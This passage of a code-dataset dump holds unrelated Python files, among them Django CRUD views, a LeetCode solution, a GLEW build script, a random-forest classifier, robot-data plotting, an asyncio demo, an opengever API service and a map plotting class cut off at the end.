가지고 온다.\n@require_http_methods(['GET'])\ndef detail(request, id):\n # Board 클래스를 사용해서 id 값에 맞는 데이터를 가지고 온다.\n # context 로 넘겨서 detail.html 페이지에서 title 과 content 를 출력해본다.\n board = get_object_or_404(Board, id=id)\n context = {'board': board}\n return render(request, 'boards/detail.html', context)\n\n\n# 특정 게시글 삭제\n@require_http_methods(['POST']) # 허용할 request 방식을 리스트에 담음.\ndef delete(request, id): # GET 요청을 받으면 status 405 error code 를 전달\n board = get_object_or_404(Board, id=id)\n board.delete()\n return redirect('boards:index')\n\n\n# 게시글 수정 페이지 렌더링\n@require_http_methods(['GET', 'POST'])\ndef edit(request, id):\n board = get_object_or_404(Board, id=id) # DRY (Don't Repeat Yourself)\n # GET\n if request.method == 'GET':\n context = {'board': board}\n return render(request, 'boards/edit.html', context)\n # POST\n else:\n title = request.POST.get('title')\n content = request.POST.get('content')\n board.title = title\n board.content = content\n board.save()\n return redirect('boards:detail', id)\n","sub_path":"boards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"622934469","text":"class Solution:\n def thirdMax(self, nums: List[int]) -> int:\n # my initial solution, not quite get there b/c time is O(nlogn)\n nums = sorted(list(set(nums)))\n \n try:\n return nums[-3]\n except:\n return nums[-1]\n \n # https://leetcode.com/problems/third-maximum-number/discuss/90207/Intuitive-and-Short-Python-solution\n def thirdMax(self, nums: List[int]) -> int:\n lst = [-float('inf'), -float('inf'), -float('inf')]\n \n for n in nums:\n if n not in lst:\n if n > lst[0]:\n lst = [n, lst[0], lst[1]]\n elif n > lst[1]:\n lst = [lst[0], n, lst[1]]\n elif n > lst[2]:\n lst = [lst[0], lst[1], n]\n \n return lst[0] if -float('inf') in lst else lst[2]","sub_path":"LeetCode/easy - Array/414. 
Third Maximum Number/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"237950855","text":"from django.shortcuts import render, get_object_or_404\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nfrom .models import Entery\r\nfrom .forms import EnteryForm\r\n\r\n\r\ndef index(request):\r\n enteries = Entery.objects.all()\r\n return render(request, 'myapp/index.html', context={'enteries': enteries})\r\n\r\n\r\ndef details(request, pk):\r\n entry = get_object_or_404(Entery, pk=pk)\r\n return render(request, \"myapp/details.html\", context={'entery': entry})\r\n\r\n\r\ndef add(request):\r\n if request.method == 'POST':\r\n form = EnteryForm(request.POST)\r\n\r\n if form.is_valid():\r\n name = form.cleaned_data['name']\r\n date = form.cleaned_data['date']\r\n description = form.cleaned_data['description']\r\n\r\n Entery.objects.create(\r\n name=name,\r\n date=date,\r\n description=description\r\n ).save()\r\n return HttpResponseRedirect('/myapp')\r\n else:\r\n form = EnteryForm()\r\n\r\n return render(request, \"myapp/form.html\", {\"form\": form})\r\n\r\n\r\ndef delete(request, pk):\r\n if request.method == 'DELETE':\r\n entery = get_object_or_404(Entery, pk=pk)\r\n entery.delete()\r\n return HttpResponseRedirect('myapp/')","sub_path":"mysite/myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"605202270","text":"from __future__ import absolute_import, print_function\nimport sys\nfrom os.path import join, sep\nfrom os import walk\nfrom .common import *\n\n__version__ = '0.1.4'\n\nglew_ver = '1.12.0'\n\n\ndef get_glew(cache, build_path, arch, pyver, package, output):\n url = ('http://iweb.dl.sourceforge.net/project/glew/glew/{0}/glew-{0}.zip'.\n format(glew_ver))\n local_url = download_cache(cache, url, build_path)\n\n print('Extracting glew {}'.format(local_url))\n with open(local_url, 'rb') as fd:\n ZipFile(fd).extractall(join(build_path, package))\n\n z = base_dir = join(build_path, package, list(listdir(join(build_path, package)))[0])\n exec_binary(\n 'Compiling Glew',\n ['gcc', '-DGLEW_NO_GLU', '-O2', '-Wall', '-W', '-Iinclude', '-DGLEW_BUILD',\n '-o', 'src/glew.o', '-c', 'src/glew.c'], cwd=base_dir, shell=True)\n exec_binary(\n '',\n ['gcc', '-shared', '-Wl,-soname,libglew32.dll',\n '-Wl,--out-implib,lib/libglew32.dll.a', '-o', 'lib/glew32.dll',\n 'src/glew.o', '-lglu32', '-lopengl32', '-lgdi32',\n '-luser32', '-lkernel32'], cwd=base_dir, shell=True)\n exec_binary(\n '', ['ar', 'cr', 'lib/libglew32.a', 'src/glew.o'], cwd=base_dir, shell=True)\n\n data = []\n for fname in glob(join(z, 'include', 'GL', '*')):\n data.append((\n fname, fname.replace(z, '').strip(sep), join('include', 'GL'), True))\n\n data.append((\n join(z, 'lib', 'libglew32.a'), join('lib', 'libglew32.a'), 'libs', True))\n data.append((\n join(z, 'lib', 'libglew32.dll.a'), join('lib', 'libglew32.dll.a'), 'libs', True))\n\n data.append((\n join(z, 'lib', 'glew32.dll'), join('bin', 'glew32.dll'),\n join('share', package, 'bin'), False))\n\n make_package(join(build_path, 'project'), package, data, __version__, output, 'MIT')\n\n\nif __name__ == '__main__':\n 
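    # parse_args comes from the star import of .common above; presumably it parses the\n    # shared CLI options (cache, build_path, arch, pyver, package, output) and dispatches to get_glew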
parse_args(get_glew)\n","sub_path":"win/glew.py","file_name":"glew.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"544494691","text":"\n\nfrom xai.brain.wordbase.nouns._hallmark import _HALLMARK\n\n#calss header\nclass _HALLMARKS(_HALLMARK, ):\n\tdef __init__(self,): \n\t\t_HALLMARK.__init__(self)\n\t\tself.name = \"HALLMARKS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"hallmark\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_hallmarks.py","file_name":"_hallmarks.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"505321585","text":"import math\n\ndef angles(a, b, c):\n # /\\\n # a/ \\ b\n # /____\\\n # c\n for_alpha_up = b**2 + c**2 - a**2\n print(for_alpha_up)\n for_alpha_down = 2*b*c\n print(for_alpha_down)\n for_beta_up = a**2 + c**2 - b**2\n print(for_beta_up)\n for_beta_down = 2*a*c\n print(for_beta_down)\n\n try:\n alpha = round(float(math.degrees(math.acos(for_alpha_up / for_alpha_down))))\n beta = round(float(math.degrees(math.acos(for_beta_up / for_beta_down))))\n gamma = 180 - alpha - beta\n if gamma == 180:\n gamma = 0\n except ValueError:\n alpha = 0\n beta = 0\n gamma = 0\n angle = []\n angle.append(alpha)\n angle.append(beta)\n angle.append(gamma)\n print(angle)\n angle.sort()\n return angle\n\n\n\n\n #return [0, 0, 0]\n\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert angles(4, 4, 4) == [60, 60, 60], \"All sides are equal\"\n assert angles(3, 4, 5) == [37, 53, 90], \"Egyptian triangle\"\n assert angles(2, 2, 5) == [0, 0, 0], \"It can not be a triangle\"\n assert angles(10, 20, 30) == [60, 60, 60], \"All sides are equal\"\n\n print(\"Code's finished? 
Earn rewards by clicking 'Check' to review your tests!\")\n","sub_path":"10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"80257380","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport sys\nimport os\n\nexclude = (\"id\", \"test\", \"train\", \"status_group\", \"num_private\", \"scheme_name\",\n 'waterpoint_type_group',\n 'quality_group',\n 'payment_type',\n 'extraction_type_group',\n 'extraction_type_class',\n 'management_group',\n 'source_type',\n 'source_class')\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ntrainx_path = os.path.join(os.getenv(\"ML_FINAL_DATA_PATH\"), \"PJ3\", \"training_values_processed.csv\")\ntestx_path = os.path.join(os.getenv(\"ML_FINAL_DATA_PATH\"), \"PJ3\", \"testing_values_processed.csv\")\n\ntrain_values = pd.read_csv(trainx_path)\ntest_values = pd.read_csv(testx_path)\n\n######################\n# Select features\n##################################################################\n\nprint(\"Select features\")\n# Select all features except which start with a string in exclude\nfeatures = [col for col in list(train_values) if not col.startswith(exclude)]\n\n######################\n# Train model\n##################################################################\n\nprint(\"Train model\")\n# Build a forest of trees from the training set\nclf = RandomForestClassifier(n_estimators=500, \n min_samples_leaf=2, \n max_features=0.20, \n oob_score=True, \n n_jobs=-1,\n random_state=242).fit(train_values[features],\n train_values[\"status_group\"])\n\n######################\n# Evaluate model\n##################################################################\n\nprint(\"Evaluate model\")\nprint(\"OOB Error Score: \" + str(round(1 - clf.oob_score_, 4)))\n\nfrom sklearn.model_selection import cross_val_score\n\n# Make prediction\npredicted = clf.predict(train_values[features])\n\n# Confusion matrix\npd.crosstab(train_values.status_group, predicted, rownames=['Actual'], colnames=['Predicted'])\n\n# Sorted feature importance\n# fi = sorted(list(zip(train_values[features], clf.feature_importances_)), key=lambda x: str(x[1]), reverse=True)\n# print(fi)\n\n# Evaluate a score by cross-validation\n#scores = cross_val_score(clf, train_values[features], train_values[\"status_group\"], cv=10)\n#print(\"Accuracy: %0.4f (+/- %0.4f)\" % (scores.mean(), scores.std() * 2))\n\n######################\n# Prediction for competition\n##################################################################\n\nprediction = clf.predict(test_values[features])\nprediction_df = pd.DataFrame(prediction, columns=[\"status_group\"])\nsubmission = pd.merge(test_values.id.reset_index()[\"id\"].to_frame(), prediction_df, right_index = True, left_index = True)\nprint(submission.head())\nsubmission.to_csv(\"sub.csv\", index = False)\n","sub_path":"src/PJ3/villrf.py","file_name":"villrf.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"268379117","text":"#!/usr/bin/python3\n# -*- encoding: utf-8 -*-\n\nimport sys\nimport os\nimport re\n\nif (len(sys.argv) < 2):\n print(\"Usage: {0} {1}\".format(\n sys.argv[0],\n 'extract clk from fpga dump '))\n quit()\n\n\ndef ex_clk(fname):\n with open(fname, 'r') as f:\n for line in f:\n r = re.match(r'\\d+\\(\\d+\\), type.*\\s(\\d+)\\(\\d+ns\\)', line)\n if (r):\n print(r.group(1))\n\n\ndef 
main():\n    fname = sys.argv[1]\n    ex_clk(fname)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"ex_clk.py","file_name":"ex_clk.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"147008378","text":"__author__ = 'Monique Tucker'\n\nimport unittest\nfrom test_pairstest import look_for_pairs\n\nclass MyTestCase(unittest.TestCase):\n    def test_successful_pairs_match(self):\n        self.assertTrue(look_for_pairs([2, 5]))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"python_projects/test_pairstest2.py","file_name":"test_pairstest2.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"334003916","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n#-----\n\nfrom scipy.interpolate import CubicSpline\n\n\ndef create_spline(qd):\n    step = 0.1\n\n    qd_set = [[],[],[],[],[]]\n    data_space = [[],[],[],[],[]]\n\n\n    #Transform data\n    qd = qd.transpose()\n\n    i = 0\n    for qdi in qd:\n        x = np.arange(0,qdi.shape[1])\n        y = np.squeeze(np.asarray(qdi))\n\n        cs = CubicSpline(x,y)\n\n        data_space[i] = np.arange(0,qdi.shape[1]-1,step)\n\n        qd_set[i]=cs(data_space[i])\n\n        i = i + 1\n\n\n    #plt.plot(data_space[1],qd_set[1])\n    #plt.show()\n    return qd_set\n\ndef readDataFromfile(filename):\n\n    datafile = open(filename,'r')\n    #Load every line except the last one since it may be incomplete, because\n    # ctrl-c is used and cutting in the middle of writing to file is possible.\n    datas = np.genfromtxt(datafile,skip_footer=1)\n\n    data_from_robot = {'qd':[],'q':[],'q_tilde':[],'u':[],'g':[],'t':[]}\n\n    for i in range(0,datas.shape[0]-5,6):\n        data_from_robot['qd'].append(datas[i])\n        data_from_robot['q'].append(datas[i+1])\n        data_from_robot['q_tilde'].append(datas[i+2])\n        data_from_robot['u'].append(datas[i+3])\n        data_from_robot['g'].append(datas[i+4])\n        data_from_robot['t'].append(datas[i+5])\n\n\n    datafile.close()\n    return data_from_robot\n\ndef plotJointAngles(dtf,radians,degrees,autos):\n\n    t = [item[0] for item in dtf['t']]\n\n    q1 = [item[0] for item in dtf['q']]\n    q2 = [item[1] for item in dtf['q']]\n    q3 = [item[2] for item in dtf['q']]\n    q4 = [item[3] for item in dtf['q']]\n    q5 = [item[4] for item in dtf['q']]\n\n    qd1 = [item[0] for item in dtf['qd']]\n    qd2 = [item[1] for item in dtf['qd']]\n    qd3 = [item[2] for item in dtf['qd']]\n    qd4 = [item[3] for item in dtf['qd']]\n    qd5 = [item[4] for item in dtf['qd']]\n\n\n\n    if radians:\n        plt.figure(1)\n\n        plt.subplot(511)\n        plt.plot(t,q1,'r',t,qd1)\n        plt.title('Measured joint angles and desired joint angles')\n        plt.xlabel('time(seconds)')\n        plt.ylabel('q_1 (rad)')\n        plt.ylim(ylimitLO,ylimitHI)\n        plt.autoscale(autos)\n\n        plt.subplot(512)\n        plt.plot(t,q2,'r',t,qd2)\n        plt.xlabel('time(seconds)')\n        plt.ylabel('q_2 (rad)')\n        plt.ylim(ylimitLO,ylimitHI)\n        plt.autoscale(autos)\n\n        plt.subplot(513)\n        plt.plot(t,q3,'r',t,qd3)\n        plt.xlabel('time(seconds)')\n        plt.ylabel('q_3 (rad)')\n        plt.ylim(ylimitLO,ylimitHI)\n        plt.autoscale(autos)\n\n        plt.subplot(514)\n        plt.plot(t,q4,'r',t,qd4)\n        plt.xlabel('time(seconds)')\n        plt.ylabel('q_4 (rad)')\n        plt.ylim(ylimitLO,ylimitHI)\n        plt.autoscale(autos)\n\n        plt.subplot(515)\n        plt.plot(t,q5,'r',t,qd5)\n        plt.xlabel('time(seconds)')\n        plt.ylabel('q_5 (rad)')\n        plt.ylim(ylimitLO,ylimitHI)\n        plt.autoscale(autos)\n\n        plt.show()\n\n    if degrees:\n        plt.figure(2)\n\n        plt.subplot(511)\n        plt.plot(t,np.degrees(q1),'r',t,np.degrees(qd1))\n
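        # 'r' draws the measured angles in red; the second trace (default colour) is the desired trajectory qd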
plt.title('Measured joint angles and desired joint angles')\n plt.xlabel('time(seconds)')\n plt.ylabel('q_1 (deg)')\n plt.ylim(ylimitLO,ylimitHI)\n plt.autoscale(autos)\n\n plt.subplot(512)\n plt.plot(t,np.degrees(q2),'r',t,np.degrees(qd2))\n plt.xlabel('time(seconds)')\n plt.ylabel('q_2 (deg)')\n plt.ylim(ylimitLO,ylimitHI)\n plt.autoscale(autos)\n\n plt.subplot(513)\n plt.plot(t,np.degrees(q3),'r',t,np.degrees(qd3))\n plt.xlabel('time(seconds)')\n plt.ylabel('q_3 (deg)')\n plt.ylim(ylimitLO,ylimitHI)\n plt.autoscale(autos)\n\n plt.subplot(514)\n plt.plot(t,np.degrees(q4),'r',t,np.degrees(qd4))\n plt.xlabel('time(seconds)')\n plt.ylabel('q_4 (deg)')\n plt.ylim(ylimitLO,ylimitHI)\n plt.autoscale(autos)\n\n plt.subplot(515)\n plt.plot(t,np.degrees(q5),'r',t,np.degrees(qd5))\n plt.xlabel('time(seconds)')\n plt.ylabel('q_5 (deg)')\n plt.ylim(ylimitLO,ylimitHI)\n plt.autoscale(autos)\n\n plt.show()\n\n\nif __name__ == '__main__':\n filename = '/home/magnaars/catkin_ws/src/five_dof_robotarm/src/datafile.txt'\n\n dtf = readDataFromfile(filename)\n\n #Upper and lower limits of y-axis\n ylimitHI = float('nan')\n ylimitLO = float('nan')\n\n #Choose to plot in rad or deg\n radians = False\n degrees = True\n\n #autoscale\n autos = True\n\n plotJointAngles(dtf,radians,degrees,autos)\n","sub_path":"src/plot_robot_data.py","file_name":"plot_robot_data.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"636257349","text":"import asyncio\nimport random\nimport time\nimport sys\n\nBOOTS = 0\nstart_time = 0\n\nasync def make_boot():\n global BOOTS\n manufacturing_time = random.choice([1,3,5])\n await asyncio.sleep(manufacturing_time)\n BOOTS += 1\n\nasync def print_data():\n while 1:\n global start_time\n await asyncio.sleep(1)\n current_time=loop.time()\n print(\"seconds: {} boots: {}\".format(current_time-start_time,BOOTS))\n\nasync def worker():\n while 1:\n await make_boot()\n\nasync def main():\n await asyncio.gather(worker(), print_data())\n\ndef build_tasks(workers):\n tasks = [\n asyncio.ensure_future(print_data())]\n for _ in range(workers):\n tasks.append(asyncio.ensure_future(worker()))\n\n return tasks\n\nif __name__ == \"__main__\":\n workers = int(sys.argv[1])\n loop = asyncio.get_event_loop()\n start_time=loop.time()\n tasks = build_tasks(workers)\n loop.run_until_complete(asyncio.wait(tasks))\n loop.close()\n","sub_path":"python_async_intro/boot_factory_3.py","file_name":"boot_factory_3.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623092718","text":"from opengever.api.ogdslistingbase import OGDSListingBaseService\nfrom opengever.api.solr_query_service import DEFAULT_SORT_INDEX\nfrom opengever.base.helpers import display_name\nfrom opengever.globalindex.model.task import AVOID_DUPLICATES_STRATEGY_LOCAL\nfrom opengever.globalindex.model.task import Task\nfrom opengever.ogds.models.group import Group\nfrom opengever.ogds.models.group import groups_users\nfrom opengever.ogds.models.team import Team\nfrom opengever.task.helper import task_type_value_helper\nfrom plone.restapi.interfaces import ISerializeToJson\nfrom sqlalchemy import Date\nfrom zope.globalrequest import getRequest\nfrom zope.i18n import translate\n\n\ndef translate_review_state(review_state):\n return translate(review_state, domain='plone', context=getRequest())\n\n\nclass GlobalIndexGet(OGDSListingBaseService):\n\n model_class = 
Task\n\n searchable_columns = [Task.title, Task.text,\n Task.sequence_number, Task.responsible]\n facet_columns = (\n Task.issuer,\n Task.responsible,\n Task.review_state,\n Task.task_type,\n )\n facet_label_transforms = {\n 'issuer': display_name,\n 'responsible': display_name,\n 'review_state': translate_review_state,\n 'task_type': task_type_value_helper,\n }\n\n default_sort_on = DEFAULT_SORT_INDEX\n default_sort_order = 'descending'\n serializer_interface = ISerializeToJson\n unique_sort_on = 'id'\n\n def extend_query_with_filters(self, query, filters):\n for key, value in filters.items():\n if not isinstance(value, list):\n value = [value]\n\n if key.startswith('-'):\n key = key[1:]\n exclude = True\n else:\n exclude = False\n\n column = getattr(Task, key, None)\n if column is None:\n continue\n\n # If filtering by responsible, also include all teams the user\n # belongs to.\n if column is Task.responsible and len(value) == 1:\n value.extend([\n team.actor_id() for team in\n Team.query.join(Group).join(groups_users)\n .filter_by(userid=value[0])\n ])\n\n if isinstance(column.type, Date):\n lower, upper = value[0].split(' TO ')\n if lower == '*':\n query = query.filter(column <= upper)\n elif upper == '*':\n query = query.filter(column >= lower)\n else:\n query = query.filter(column.between(lower, upper))\n elif exclude:\n query = query.filter(column.notin_(value))\n else:\n query = query.filter(column.in_(value))\n return query\n\n def get_base_query(self):\n strategy = self.request.form.get('duplicate_strategy',\n AVOID_DUPLICATES_STRATEGY_LOCAL)\n return Task.query.restrict().avoid_duplicates(strategy=strategy)\n","sub_path":"opengever/api/globalindex.py","file_name":"globalindex.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"615619643","text":"#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n\n### Import functions\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport os\nimport torch\nimport torch.nn as nn\nfrom matplotlib import cm\n\nsys.path.append('')\n\nimport fct_facilities as fac\nimport fct_network as net\nimport fct_integrals as integ\n\n\nfac.SetPlotParams()\n\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n### Set parameters\n\nP = 20\nN = 200\neta = 0.4\n\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n### Theory \n\ngain_values_th = np.linspace( 1, 1.75*4, 80 )\noffset_values_th = np.linspace( 0, 2, 80 )\n\nK_bar_th = np.zeros(( 2, 2, len(gain_values_th), len(gain_values_th) )) # First axis indicates t = 0 or t = T\nY_bar_th = np.zeros(( 2, 2, len(gain_values_th), len(gain_values_th) ))\n\nK_corr_th = np.zeros(( 2, len(gain_values_th), len(offset_values_th) ))\nY_corr_th = np.zeros(( 2, len(gain_values_th), len(offset_values_th) ))\n\n#\n\nih = net.ih\nil = net.il\n\ndoCompute = 1\n\nif doCompute:\n\n\tfor i, gain in enumerate(gain_values_th):\n\n\t\tfor j, offset in enumerate(offset_values_th):\n\n\t\t\t#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### 
#### #### ####\n\t\t\t### t = 0 \n\n\t\t\t# Almost everyinteging remains 0\n\n\t\t\t#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n\t\t\t### t = T \n\n\t\t\t# Compute coordinates\n\n\t\t\talpha = integ.PsiPrimeSq(gain, offset) + eta * (integ.PsiSq(gain, offset) - integ.Psi(gain, offset)**2)\n\t\t\tbeta = eta * P/2. * integ.Psi(gain, offset)**2 \n\n\t\t\tch = ( ih + beta/alpha*(ih - il) ) / (alpha + 2*beta) \n\t\t\tcl = ( il - beta/alpha*(ih - il) ) / (alpha + 2*beta)\n\n\t\t\t# Projections on axes\n\n\t\t\tK_bar_th[1,0,i,j] = ch * integ.PsiPrime()\n\t\t\tK_bar_th[1,1,i,j] = cl * integ.PsiPrime()\n\n\t\t\tY_bar_th[1,0,i,j] = ch * integ.PsiPrimeSq()\n\t\t\tY_bar_th[1,1,i,j] = cl * integ.PsiPrimeSq()\n\n\t\t\t# Compute dot products\n\n\t\t\tKnormA = N + integ.PsiPrimeSq(gain, offset) * ch**2\n\t\t\tKnormB = N + integ.PsiPrimeSq(gain, offset) * cl**2 \n\t\t\tKAA = integ.PsiPrime(gain, offset)**2 * ch**2 \n\t\t\tKBB = integ.PsiPrime(gain, offset)**2 * cl**2 \n\t\t\tKAB = integ.PsiPrime(gain, offset)**2 * ( ch * cl )\n\n\t\t\tYnormA = N * ( integ.PsiSq(gain, offset) - integ.Psi(gain, offset)**2 ) + integ.PsiPrimeFourth(gain, offset) * ch**2 \n\t\t\tYnormB = N * ( integ.PsiSq(gain, offset) - integ.Psi(gain, offset)**2 ) + integ.PsiPrimeFourth(gain, offset) * cl**2 \n\t\t\tYAA = integ.PsiPrimeSq(gain, offset)**2 * ch**2\n\t\t\tYBB = integ.PsiPrimeSq(gain, offset)**2 * cl**2 \n\t\t\tYAB = integ.PsiPrimeSq(gain, offset)**2 * ( ch * cl )\n\t\t\t\n\t\t\t# Activity measures\n\n\t\t\tK_corr_th[1,i,j] = KAB / ( np.sqrt(KnormA) * np.sqrt(KnormB) )\n\t\t\tY_corr_th[1,i,j] = YAB / ( np.sqrt(YnormA) * np.sqrt(YnormB) )\n\n\n\t# Store \n\n\tfac.Store(gain_values_th, 'gain_values_th.p', 'Results/')\n\tfac.Store(offset_values_th, 'offset_values_th.p', 'Results/')\n\n\tfac.Store(K_bar_th, 'K_bar_th.p', 'Results/')\n\tfac.Store(Y_bar_th, 'Y_bar_th.p', 'Results/')\n\n\tfac.Store(K_corr_th, 'K_corr_th.p', 'Results/')\n\tfac.Store(Y_corr_th, 'Y_corr_th.p', 'Results/')\n\nelse:\n\n\t# Retrieve\n\n\tgain_values_th = fac.Retrieve('gain_values_th.p', 'Results/')\n\toffset_values_th = fac.Retrieve('offset_values_th.p', 'Results/')\n\n\tK_bar_th = fac.Retrieve('K_bar_th.p', 'Results/')\n\tY_bar_th = fac.Retrieve('Y_bar_th.p', 'Results/')\n\n\tK_corr_th = fac.Retrieve('K_corr_th.p', 'Results/')\n\tY_corr_th = fac.Retrieve('Y_corr_th.p', 'Results/')\n\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n### Plot \n\nfac.SetPlotDim(2.1, 1.8)\ndashes = [3,3]\n\n#\n\ncmap_base = 'bwr'\nvmin, vmax = 0.2, 0.8\ncmap = fac.TruncateCmap(cmap_base, vmin, vmax)\n\n#\n\nfg = plt.figure()\nax0 = plt.axes(frameon=True)\n\ncax = plt.imshow(Y_corr_th[1,:,:].T, aspect = 'auto', vmin=-0.1, vmax=0.1, \\\n\textent = (min(gain_values_th)/4., max(gain_values_th)/4., min(offset_values_th), max(offset_values_th)), origin='lower', interpolation='nearest', cmap = cmap)\n\ncbar = fg.colorbar(cax, ticks=[-0.1, 0, 0.1], orientation='vertical')\ncbar.ax.set_xticklabels(['-0.1', '0', '0.1'])\n\nplt.xlabel(r'Gain')\nplt.ylabel(r'Threshold')\n\nplt.grid('off')\n\nplt.xticks([0.25, 1, 1.75])\nplt.yticks([0, 1, 2])\n\n# plt.colorbar()\n\nax0.spines['top'].set_visible(False)\nax0.spines['right'].set_visible(False)\nax0.yaxis.set_ticks_position('left')\nax0.xaxis.set_ticks_position('bottom')\n# 
plt.locator_params(nbins=4)\n\nplt.savefig('Y_corr.pdf')\nplt.show()\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####\n\nsys.exit(0)\n","sub_path":"SimpleCategorization/Correlations/Psi/compute_theory.py","file_name":"compute_theory.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"272036380","text":"\"\"\"\nMap plotter interface.\n\"\"\"\n\nfrom IPython.display import HTML, display\n\nfrom .display import map_to_html, standalone_html\n\n__all__ = ['Map', 'GeoPoint']\n\n\nclass GeoPoint(object):\n def __init__(self, lat, lon, weight=None):\n self.lat = lat\n self.lon = lon\n self.weight = weight\n\n @staticmethod\n def parse(obj):\n if isinstance(obj, GeoPoint):\n return obj # FIXME: why doesnt work?\n\n elif (isinstance(obj, list) or isinstance(obj, tuple)) and len(obj) in [2, 3]:\n return GeoPoint(*obj)\n\n elif isinstance(obj, str):\n parts = obj.strip().split(',')\n return GeoPoint(*map(float, parts))\n\n else:\n raise ValueError('Cannot convert \"%s\" to GeoPoint' % repr(obj))\n\n def to_coord(self):\n return self.lat, self.lon\n\n\ndef _coordinates(point):\n geo_point = GeoPoint.parse(point)\n if geo_point.weight:\n return {\n \"type\": 'Feature',\n \"geometry\": {\n \"type\": 'Point',\n \"coordinates\": geo_point.to_coord()\n },\n \"properties\": {\n \"weight\": geo_point.weight\n }\n }\n else:\n return geo_point.to_coord()\n\n\ndef _coordinates_many(points):\n coordinates = [_coordinates(point) for point in points]\n if len(coordinates) > 0 and isinstance(coordinates[0], dict):\n return {\n \"type\": 'FeatureCollection',\n \"features\": coordinates\n }\n\n return coordinates\n\n\nclass Map(object):\n \"\"\"\n Canvas for visualizing data on the interactive map.\n \"\"\"\n\n def __init__(self, show_click_coords=False):\n self.show_click_coords = show_click_coords\n self.center = [55.76, 37.64]\n self.zoom = 8\n self.objects = []\n\n def set_state(self, center, zoom):\n self.center = center\n self.zoom = zoom\n\n def add_object(self, obj):\n self.objects.append(obj)\n\n def add_placemark(self, point, hint=None, content=None, preset='islands#icon', icon_color=None):\n obj = {\n 'type': 'Placemark',\n 'point': _coordinates(point),\n 'hint': hint,\n 'content': content\n }\n\n if icon_color:\n obj['iconColor'] = icon_color\n\n if preset:\n obj['preset'] = preset\n\n self.add_object(obj)\n\n def add_line(self, points, hint=None, content=None, color='#000000', width=4, opacity=0.5):\n self.add_object({\n 'type': 'Line',\n 'points': _coordinates_many(points),\n 'hint': hint,\n 'content': content,\n 'color': color,\n 'width': width,\n 'opacity': opacity,\n })\n\n def add_heatmap(\n self,\n points,\n intensity_of_midpoint=0.2,\n radius=10,\n dissipating=False,\n gradient={\n 0.1: 'rgba(128, 255, 0, 0.7)',\n 0.2: 'rgba(255, 255, 0, 0.8)',\n 0.7: 'rgba(234, 72, 58, 0.9)',\n 1.0: 'rgba(162, 36, 25, 1)'\n }\n ):\n self.add_object({\n 'type': 'Heatmap',\n 'points': _coordinates_many(points),\n \"intensityOfMidpoint\": intensity_of_midpoint,\n \"radius\": radius,\n \"dissipating\": dissipating,\n \"gradient\": gradient\n })\n\n def add_circle(\n self,\n center,\n radius,\n hint=None,\n content=None,\n fill=True,\n color='#000000',\n opacity=0.5,\n width=1.0,\n fill_color=None,\n fill_opacity=None,\n stroke_color=None,\n stroke_opacity=None\n ):\n if fill_color is None:\n fill_color = color\n if fill_opacity is None:\n fill_opacity = opacity\n if 
